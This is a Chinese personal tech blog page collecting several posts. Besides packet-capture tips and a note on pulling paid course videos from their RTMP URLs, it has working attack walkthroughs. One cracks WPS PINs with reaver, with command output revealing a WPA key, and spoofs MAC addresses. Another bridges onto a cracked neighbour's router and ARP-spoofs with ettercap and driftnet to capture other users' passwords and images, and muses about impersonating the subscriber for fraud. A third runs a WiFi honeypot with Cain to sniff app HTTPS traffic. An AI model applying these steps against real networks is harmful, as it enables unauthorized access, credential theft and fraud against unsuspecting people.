Mac 下解决默认安装后 wireshark 抓包提示 you don't have permission 的权限问题 技术文章

Mac 下安装好 wireshark 抓包软件后,打开会提示:you don't hava permission to capture on local interfaces. you can fix this by instaling ChmodBPF .可是当你按照提示安装好 ChmodBPF 后打开 wireshark 依然还是会提示你这个一样的错误。如下图:

shotpic_2021-10-14_19-34-18.png 

解决办法...


admin 发布于  2021-10-14 19:35 

QQ空间里的奇怪艾特 杂七杂八

故事背景:正在听歌,逛社区的时候,QQ弹窗,说XXX提到了你 ,也不知道谁艾特我,根本就不玩QQ空间的,就进空间看,结果就是这样的:

1.png

又是谁谁提到了你,扎金花,什么的,带一大堆评论,艾特你得好友/陌生人(没测试,但是确实艾特了一大堆人)。

因为,已经遇到过好多次我的好友里面有这种。。。但是我想看看这是什么东西,so,打开fiddler,抓包看一下,结果一看就觉得天朝真的是个因吹丝挺的国度!,发现点进后就通过腾讯的url.cn跳转,而且还带你得QQ号,IP信息,有意思的是期间有个域名,好有迷惑性:m2.people.cn,具体的看图:m.pngm2.png23.gifurl.cn.png

QQ空间周围的灰色产业都是人尽皆知的事情。。。。但是人民网这样的gov也玩这个?不能想,希望是被社,然后二级域名被卖?还是里面有人故意卖?

这些都是,鹅厂,校长,数字家的绿色通道啊,这种推广真的是防不胜防。。。。还好,只是采集访问者的信息,不是木马。。。。为什么这么说呢?

采集你信息,在天朝是在正常不过的事。。。没给你装木马就不错了!这些完全就,新闻源这类似的推广,而且你每次打开这些网址,最终引导的网站都不尽相同,什么一号店,淘宝,天猫,苏宁易购,汽车网,等等。。。

事后,问过艾特我的那个人,他说他在网吧登陆QQ时,扫描了一下二维码,呵呵哒,切记二维码不能乱扫,还有那些说烧苗登录安全的,不一定哦!

在这近乎裸体的畅游在互联网里,我们还是改处处小心微妙啊。。。。就说这么多,下回见!


admin 发布于  2016-12-3 14:53 

如何下载新东方的在线视频小计-已成功crack 技术文章

如何下载新东方的在线视频小计-已成功crack,Mrxn再次小计一下,一般日后查看.当然呢,各位需要的也可以留言帮你下载的.

04.png

首先呢,这个零基础法语语音入门课程是需要9.9元的.还是有点小贵! 最主要的是电脑端不能下载.在新东方在线手机APP端可以缓存....这是我所不能容忍的......

内容大致如下:

03.png

下图是Mrxn下载完所有的教程截图:

01.png

于是我就想下载下来.但是几经尝试,还是未果,常见的抓取下载方式都失败了.已近花费了我两个小时.......

不甘心....既然是flash播放,cookie存放信息,就没有理由找不到视屏原地址,甚至把新东方的swf逆向解码了,下面是swf的源代码:
05.png

从中得到了一个比较有用的信息就是下面的这个句子:

rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_1.mp4

因为当时看的是第一节的第一小节,我就想这文件命名是不是这个规律,只是后面的数字不同,代表不同的节数.最后证实这是正确的.

rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_1.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_2.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_3.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_4.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_1_5.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_1.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_2.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_3.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_4.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_5.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_6.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_7.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_8.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_9.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_10.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_11.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_2_12.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_3_1.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_3_2.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_3_3.mp4
rtmp://fms.koolearn.com/vod2/mp4:xyz/fy/2014_fy_fyyy_Lww_3_4.mp4
这是后话,只不过,如何下载呢?  rtmp  我之前还只是在网上看到过这个,现在自己遇到了.真的很棘手,因为现在我国大部分的网站采用的都是http协议的视屏播放.即本地播放.所以都很容易下载.  rtmp则是一种较新的协议.采用服务器实时播放.想在本地保存视屏就没那么容易了.

我又不是通信专业的,有没学过通信协议,顶多学过TCP/IP协议...那就只有向google 百度求救...终于找到方法下载,可是却不成功.....最终在hackup的提醒下,我成功的下载了rtmp视屏,还专门测试了新东方及其他采用rtmp协议播放视屏的网站,都成功了.

估计很多人都想知道怎么下载的,但是,处于版权原因,我就不再博客说明了.需要下载rtmp 新东方视屏的可以找我帮你下载.至少目前是可以成功下载的.明天把我今天自己下载的视屏分享给大家吧.希望可以帮助到有兴趣的童鞋.



admin 发布于  2015-7-1 20:04 

使用猜解PIN破解无线路由密码 网络安全

目录:

  • 方法一:Kali或BTx
  • 方法二:CDlinux 水滴minidwep-gtk
  • 方法三:CDlinux 打气桶Inflator

路由器的pin码是快速连接功能的识别码。比如你设置个非常复杂的无线密码,每次有设备加入无线网络的时候,输入密码是很麻烦的。这个时候就可以通 过输入8位的pin码,路由器识别后就允许加入网络了,相当于输入了无线密码。在win7下设置路由器的时候要求pin码,也是一种识别验证路由器的方 式。另外这个码也是可以变化的,可以在路由器的qss或wps功能里查询到。默认的pin码在路由器的背面有。

WPS能帮助用户自动设置网络名(SSID)、配置最高级别的WPA2安全密钥,具备这一功能的无线产品往往在机身上设计有一个功能键,称为WPS 按钮,用户只需轻轻按下该按钮或输入PIN码,再经过两三步简单操作即可完成无线加密设置,同时在客户端和路由器之间建立起一个安全的连接。TP- LINK上的叫QSS。

现在默认关闭wps,防pin的路由越来越多了,再不试试猜解PIN破解无线路由密码以后就没机会了。三种方法原理大致一样,只是工具不同而已。

方法一:Kali或BTx

1. Ifconfig #查看当前是否存在无线网卡,iwconfig更简洁,只显示无线网卡信息。

root@NIGER:~# ifconfig
wlan0     Link encap:Ethernet  HWaddr 00:e0:4c:6b:96:bd  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

2. airmon-ng start wlan0 #开启无线网卡监听模式

root@NIGER:~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID Name
3135 dhclient
3167 NetworkManager
3626 wpa_supplicant
Interface Chipset  Driver
wlan0  Realtek RTL8187L rtl8187 - [phy0]
    (monitor mode enabled on mon0)

3. ifconfig #查看一下是否开启成功,成功有话会出现mon0网卡

root@NIGER:~# ifconfig
mon0      Link encap:UNSPEC  HWaddr 00-E0-4C-6B-96-BD-3A-30-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:358 errors:0 dropped:358 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:28458 (27.7 KiB)  TX bytes:0 (0.0 B)
wlan0     Link encap:Ethernet  HWaddr 00:e0:4c:6b:96:bd  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

4. wash –i mon0 #列出mon0网卡接收到的开了wps的无线信息,并不是全部无线信息,选择信号最好的,RSSI越大越好,如下,-58最大

root@NIGER:~# wash -i mon0
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:61:18:00:E7:40       1            -68        1.0               No                CAT-MAITAI
5C:63:BF:44:29:8A       1            -64        1.0               No                dashizi
F4:EC:38:1D:1F:C0       4            -58        1.0               No                TP-LINK_1D1FC0
0C:72:2C:FD:F7:AC      11            -60        1.0               No                myWLAN
^C

5. reaver –i mon0 –b mac –vv –c channel –p pin(pin未知) #-i指定网卡 -b指定路由地址 -c 指定无线信道 -p 指定pin码,一位也不知道就不用加-p,如果知道前4位就输入前4位

root@NIGER:~# reaver -i mon0 -b F4:EC:38:1D:1F:C0 -vv -c 4
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:EC:38:1D:1F:C0
[+] Switching mon0 to channel 4
[+] Associated with F4:EC:38:1D:1F:C0 (ESSID: TP-LINK_1D1FC0)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Sending WSC NACK
[+] Trying pin 12345670
……
[+] 94.85% complete @ 2014-08-05 22:26:18 (7 seconds/pin)
[+] Max time remaining at this rate: 1:06:09 (567 pins left to try)
[+] Trying pin 01894264
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3056 seconds
[+] WPS PIN: '01894264'
[+] WPA PSK: 'anchao1202'
[+] AP SSID: 'TP-LINK_1D1FC0'

6. reaver –i mon –b mac –p pin(pin已知) #知道pin码就可直接出密码

root@NIGER:~# reaver -i mon0 -b F4:EC:38:1D:1F:C0 -p 01894264
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from F4:EC:38:1D:1F:C0
[+] Associated with F4:EC:38:1D:1F:C0 (ESSID: TP-LINK_1D1FC0)
[+] WPS PIN: '01894264'
[+] WPA PSK: 'anchao1202'
[+] AP SSID: 'TP-LINK_1D1FC0'

7. 小技巧一:伪造自己mac地址,

root@NIGER:~# ifconfig wlan0 down
root@NIGER:~# macchanger -m 00:11:22:33:44:55 wlan0
Current MAC: xx:xx:xx:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
root@NIGER:~# ifconfig wlan0 up
root@NIGER:~# ifconfig mon0 down
root@NIGER:~# macchanger -m 00:11:22:33:44:55 mon0
Current MAC: xx:xx:xx:xx:xx:xx
Faked MAC: 00:11:22:33:44:55
root@NIGER:~# ifconfig mon0 up

方法二:CDlinux 水滴minidwep-gtk

1.S扫描

w1

2.Reaver 添加-N参数使更准确稳定

w2

w3

w4

3.技巧一:自己设置pin码,意思是前4位先跑什么范围,如下图,会先猜测0-999,然后是7000-7999,

w5

w6

4.技巧二:修改记录文件设置从上次记录开始

w7

方法三:CDlinux 打气桶Inflator

1.开启网卡混杂模式

w8

2.扫描网络

w9

3.选中网络后设定参数(pin只能填4或8位或不选),这里为省跑pin的时间直接输入pin了

w10

4.最后破解出来,没出密码,打气筒好像经常有这个问题

w11

注:原文作者:Niger 我只是收藏. PS:我用水滴特爽 几乎是攻无不破 屡试屡胜!


admin 发布于  2015-6-11 01:26 

记一次对GFW防火墙的探究 网络安全

[该文章已加密,请点击标题输入密码访问]


admin 发布于  2015-6-11 00:42 

在Firefox浏览器下使用Fiddler抓包小计 技术文章

由于工作需要,今天在Firefox浏览器下使用Fiddler抓包,但是抓了好久都没有数据。。。。。因为我大多数情况下都是使用chrome浏览器,fiddler能够很好的支持,一开始以为不支持火狐,可是很快否定了自己,因为fiddler没理由放弃火狐这个这么多用户的群体啊,于是回头从fiddler上下手找原因,终于在Fiddler的-Tools->Fiddler Option 里发现了:

点击查看原图

fiddler监听端口是:8888 并且act as system proxy on startup  ---作为系统代理 。。。偶也!当时好激动,可以解决问题了:打开火狐设置-高级-网络-设置-使用系统代理设置。完美解决!

点击查看原图05-20-000038.png

再次小计,勿喷,希望可以帮助到那些和我同样遇到这个问题的朋友。

标签: 抓包

admin 发布于  2015-5-20 19:36 

破解了你的路由密码后,我还可以这样做,绝对不是蹭你网这么简单 技术文章

这里关于破解无线路由的文章我就不发了,网上这类的教程也比较多。如果你想要软件和教程,请邮件、留言给我。

  当你在破解了别人的无线路由器密码的时候,你可能会发现你的信号不太好。当然身为IT屌丝男,肯定是随便携带一个路由器。这里恭喜你可以使用路由器桥接的一种方式来增强你的信号。你是曾经为了信号好一点而摆出这种奇怪的姿势呢,例如这样


反正本人是为了蹭网而摆出了各种奇怪的姿势,自从使用了路由器桥接,腰不酸了腿不痛了编码也有劲了。废话不多说,首先打开自己的路由器。

 

更改你的Lan口的IP地址,这里假设我改成192.168.1.225.

其次,关闭DHCP自动分配IP地址。因为是要利用对方的路由器分配的IP哦~~嘿嘿

然后在基本设置里,开启WDS功能,点击扫描

然后选择到你破解的路由器,输入密码,保存即可。

这里需要注意一下,你的路由器信道要与对方路由器信道一致。

接着可以社工了。如果是ADSL用户,你可以直接访问互联星空获取用户的基本信息,在这里我就不演示了。。。隐私。。。。通过隐私的信息,可得知对方的电话。通过IP修改号码的技术,进行诈骗,获取更多的用户信息,然后打电话给移动,冒充户主开通网上消费的业务。。。接着你就可以用宽带来刷钻了。。。。。当然这里也只是我的一些奇技淫巧yy而已,毕竟违法的事情咱是不会做的。

本人很菜,小弟就只知道Kali下Arp欺骗的两种方式,一种是iptables还有一种是GUI.iptables在其中一篇日志我已经介绍过了。这里使用另一个Gui更方便。。



着打开软件之后 点击嗅探(Sniff) Unfied Sniffing,因为我这里用的是虚拟机,所以是eth0的方式。如果不知道是什么方式,可以利用ifconfig查看

 

接着点击扫描主机,然后到主机列表。。

这里可以看到有三个主机,其中两台是路由器,我桥接别人的嘛。。。这里Target1选择对方路由器,192.168.1.1  Target2则是你需要欺骗的地址。

然后在Mitm选项里,选择第一项,把Sniff remote connections给勾上

最后开始嗅探

这里举例,我打开tudou,点击登录,用户名和密码都是i0ject.

然后在嗅探里就得到了结果。。。。

得到了用户名和密码。。。。

当然这里不必担心,自心脏出血之后。。。淘宝、微博、百度的传输的密码都已经加密了。。。我不是搞算法的,破不了。。。

 

当然你还可以这样,打开一个终端窗,root权限执行:

ettercap -i wlan0 -Tq -M arp:remote /192.168.1.101/ /192.168.1.1/ #对目标主机进行arp欺骗

新建一个终端窗口,执行:
driftnet -i eth0 #监听eth0

 

这里我主机随便打开一个页面,例如我打开了百度搜梅西。。。 无视360



成功抓取到了。。。。当然你的微信啦,陌陌什么的,QQ空间照片同样都可以抓到

当然你还可以抓包:

 

结束。。累死了


admin 发布于  2015-3-27 08:12 

在Windows平台下搭建WiFi蜜罐小计(附工具下载) 技术文章

 不知道大家对蜜罐了解多少,服务器上的蜜罐或许很多人都知道的,WiFi蜜罐你知道多少呢?


今天就小记一下自己搭建WiFi蜜罐的一些过程和心得体会。-----寒假闭关修炼 ^_^ 更新少,但是我会把他们呢记录在doc里,


出关之时,分享给大家的。嘿嘿,下面就开始正文(所有用到的工具在后面贴出来了,此处应有掌声!):

目的:捕获某APP的网络数据


       Tcpdump抓包方式


       Tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。
       1.首先你的安卓手机得拥有root,手机开启调试模式与电脑连接。
       2.将tcpdump拷贝到安卓的/data/local/tmp目录,adb命令如下:adb push c:\wherever_you_put\tcpdump /data/local/tcpdump。
       3.修改tcpdump属性为可执行,adb命令如下:adb shell chmod 777/data/local/tcpdump。
       4.进入adb模式,adb命令如下:adb shell
       5.获得root权限,命令如下:su
       6.到达指定目录/data/local/tmp,命令如下:cd /data/local/tmp
       7.启动tcpdump开始抓包,命令如下:./tcpdump -i any -p -s 0 -w /sdcard/capture.pcap。参数说明:
       # "-i any": 监听任何网络端口
       # "-p": 混杂模式
       # "-s 0": 捕获整个包
       # "-w": 将数据写入指定文件
       现在已经开始抓包了,停止抓包后将文件/sdcard/capture.pcap拷贝出来(adb pull /sdcard/capture.pcap d:/),使用wireshark打开即可对其网络数据包分析了。
       这种方式抓包我个人觉得很不方便,不过也可以很完全的捕获网络数据包,但是缺点很明显,手机系统为安卓,手机得root,反复的执行adb命令操作很是麻烦,而且不能在用户不知道情况下截获数据包,当时不知道别的方式就用这种方式分析网络数据包。


       Fiddler抓包方式


       Fiddler是最强大最好用的Web调试工具之一,它能记录所有客户端和服务器的http和https请求,允许你监视,设置断点,甚至修改输入输出数据. 使用Fiddler无论对开发还是测试来说,都有很大的帮助。
      1.     电脑与手机连入同一局域网。
      2.     打开Fiddler,     Tools->Fiddler Options 。 (配置完后记得要重启Fiddler)。
      3.     选中"Decrpt HTTPS traffic",   Fiddler就可以截获HTTPS请求。


      4.     选中"Allow remote computers to connect".  是允许别的机器把HTTP/HTTPS请求发送到Fiddler上来。


1.png

2.png

5. 将手机设置代{过}{滤}理为fiddler机器的ip,端口为8888。

此时已经完成了HTTP抓包设置,如果要捕获HTTPS的包,只需要在手机端访问IP:8888,然后安装证书即可。
这种方式设置以及操作都很简单,而且不限制平台(IOS Android PC…),均可捕获HTTP以及HTTPS,而且Fiddler还有更多强大的功能方便自己在测试调试时候使用,但是不能在用户不知道情况下截获数据              包,不可能让目标机器设置代{过}{滤}理,然后数据走向你的电脑。


 Windows下WIFI蜜罐
 最后想到了架设一个无密码WIFI,让目标自动连接后再来分析其机器的网络数据。
 曾今在看雪看过一篇文章《Windows下的无线热点蜜罐》http://bbs.pediy.com/showthread.php?t=179529&highlight=%E8%9C%9C%E7%BD%90,读者也可以参考下,本人也实践过,确实比较方便,            但是本人机器出现分享的网络不稳定情况,所以放弃这种方式,换了一种更加简便的方式。


 工具:360随身WIFI,猎豹WIFI等

3.jpg


本人使用360随身WIFI搭建了一个无密码热点。使用wireshark监听本地网卡数据,等待目标机器连接。

不懂怎么使用wireshark的可以看我这篇文章:抓包利器----Wireshark---从入门到精通谢列教程


4.png

这里使用吾爱破解的客户端APP做了测试,连接此免费WIFI蜜罐后,顺利抓到需要的东西。

5.png

 只要APP使用明文传输数据,在WIFI蜜罐下均可能泄露重要信息,有人可能会说使用HTTPS传输就安全,下面将演示由于编码不规范造成的HTTPS在WIFI蜜罐下也可能被嗅探。

 Windows下WIFI热点嗅探HTTPS原理与实现
 在安卓APP中通常在进行账号密码验证中使用HTTPS,谷歌提供了安全的API供开发者调用,但是开发者由于各种原因未能按照规范进行使用,导致 自身产品出现漏洞。原理说明,最重要的一点就是开发者未能严格校验证书导致漏洞存在,谷歌提供的HTTPS API要求开发者对签名CA是否合法,域名是否匹配,是不是自签名证书,证书是否过期做检查,但是大多数开发者实现的代码如下:
class ae implements X509TrustManager
{
  ae(ad paramad)
  {
  }
  public void checkClientTrusted(X509Certificate[] paramArrayOfX509Certificate, String paramString)
  {
  }
  public void checkServerTrusted(X509Certificate[] paramArrayOfX509Certificate, String paramString)
  {
  }
  public X509Certificate[] getAcceptedIssuers()
  {
    return null;
  }
}


这段代码已经很清晰的暴露了问题。

              实现WIFI蜜罐下嗅探HTTPS
             开启两台虚拟机,一台用于用于搭建WIFI蜜罐,一台用于嗅探HTTPS。WIFI蜜罐如上一步已经搭建完成,在另外一台机器开启cain。
              首先激活网卡

6.png

  选择ARP

7.png

选择欺骗对象,左边选中网关,右边选择欺骗对象(也就是搭建WIFI蜜罐的机器)。

8.png

 选择HTTPS,输入需要嗅探的HTTPS IP,下载证书,然后进行欺骗。环境已经OK,然后坐等数据吧。Cain很人性化的将HTTPS请求与返回数据都捕获到了。

9.png

   从 刚开始不知道如何捕获移动端网络数据包,到最后完成一次完整的HTTP以及HTTPS数据包也是花了大概一周时间,期间遇见了不少的坑,当然也在 windows以及linux做了多次尝试,最后发现windows上面是最适合我的。现在移动端APP编码规范称次不齐,笔者已经在多款APP发现有这 些问题,在这里也提醒大家不要去连接未知的WIFI,即使写明了密码,如果实在需要连接也不要使用密码操作等敏感行为。

Tools_tcpdump_cain_fiddler_wireshark_download  

密钥:wvt4EtZ37iKwO0iS7IJ41c6lhimc7IpxPjlSAKzstR0

在此提醒大家,免费的未知WiFi,一定要小心啊! 大家可以跟着步骤走,练习一下。请勿用于非法用途!



admin 发布于  2014-12-26 08:48 

抓包利器----Wireshark---从入门到精通谢列教程 技术文章


       

    2.png

      Wireshark 是网络包分析工具。网络包分析工具的主要作用是尝试捕获网络包, 并尝试显示包的尽可能详细的情况。你可以把网络包分析工具当成是一种用来测量有什么东西从网线上进出的测量工具,就好像使电工用来测量进入电信的电量的电度表一样。(当然比那个更高级)过去的此类工具要么是过于昂贵,要么是属于某人私有,或者是二者兼顾。 Wireshark出现以后,这种现状得以改变。Wireshark可能算得上是今天能使用的最好的开元网络分析软件。


下面是Wireshark一些应用的举例:

  • 网络管理员用来解决网络问题
  • 网络安全工程师用来检测安全隐患
  • 开发人员用来测试协议执行情况
  • 用来学习网络协议

除了上面提到的,Wireshark还可以用在其它许多场合。

比如在局域网抓取数据包分析,可以得到很多有用的信息,比如QQ账号,邮箱,FTP账号,所浏览的网页,还有一些敏感的信息。我就不在这里多说了,一句话:谁用谁知道!

下面是使用过程中的一些界面:

1.png


 博主个人介意最好用英文原版的,汉化的容易发生程序崩溃。

 wireshark最新原版下载地址:http://pan.baidu.com/s/1dDxjasp

  wireshark相关教程:http://pan.baidu.com/s/1kTsnglL 

 更多的软件、电影、音乐资源下载请关注网盘: http://pan.baidu.com/share/home?uk=2132293084  快捷及时!


admin 发布于  2014-6-18 14:51